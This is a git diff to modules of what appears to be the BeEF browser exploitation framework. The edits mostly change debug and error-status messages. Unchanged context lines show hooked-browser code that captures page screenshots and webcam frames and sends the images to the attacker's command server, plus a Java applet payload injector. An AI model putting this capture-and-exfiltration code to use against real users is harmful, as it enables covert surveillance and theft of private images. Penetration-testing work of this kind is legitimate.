diff --git a/modules/browser/spyder_eye/command.js b/modules/browser/spyder_eye/command.js index a3c3f4686..3e07c96e8 100644 --- a/modules/browser/spyder_eye/command.js +++ b/modules/browser/spyder_eye/command.js @@ -15,17 +15,17 @@ beef.execute(function() { var d = canvas.toDataURL('image/png'); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'image=' + d ); }); - - beef.debug('[Spyder_Eye] html2canvas hasn\'t failed, that\'s something'); + beef.debug('[Spyder Eye] Took snapshot successfully'); } catch (e) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Obtaining snapshot failed: ' + e.message); + beef.debug('[Spyder Eye] Obtaining snapshot failed: ' + e.message); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Obtaining snapshot failed: ' + e.message); } }; takeit = function() { for(var i = 0; i < takes; i++) { - beef.debug('[Spyder_Eye] Taking ' + i + '. snapshot'); + beef.debug('[Spyder Eye] Taking snapshot #' + i); setTimeout(snap, delay * i); } }; diff --git a/modules/browser/webcam_html5/command.js b/modules/browser/webcam_html5/command.js index 7818a845c..12db7576a 100644 --- a/modules/browser/webcam_html5/command.js +++ b/modules/browser/webcam_html5/command.js @@ -23,7 +23,7 @@ beef.execute(function() { ctx.drawImage(vid_el,0,0); beef.net.send("<%= @command_url %>",<%= @command_id %>, 'image='+can_el.toDataURL('image/png')); } else { - beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong'); + beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong', beef.are.status_error()); } } @@ -36,15 +36,9 @@ beef.execute(function() { setTimeout(cap,2000); }, function(err) { - beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed'); + beef.debug('[Webcam HTML5] Error: getUserMedia call failed'); + beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed', beef.are.status_error()); }); - - - }); - - - - diff --git a/modules/exploits/local_host/java_payload/command.js b/modules/exploits/local_host/java_payload/command.js index 84327e9b5..7e2f835a4 100755 --- a/modules/exploits/local_host/java_payload/command.js +++ b/modules/exploits/local_host/java_payload/command.js @@ -38,7 +38,7 @@ beef.execute(function() { // }, 100); - + beef.debug('[Java Payload] Applet with id[' + applet_id + '] added to the DOM.'); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet with id[' + applet_id + '] added to the DOM.');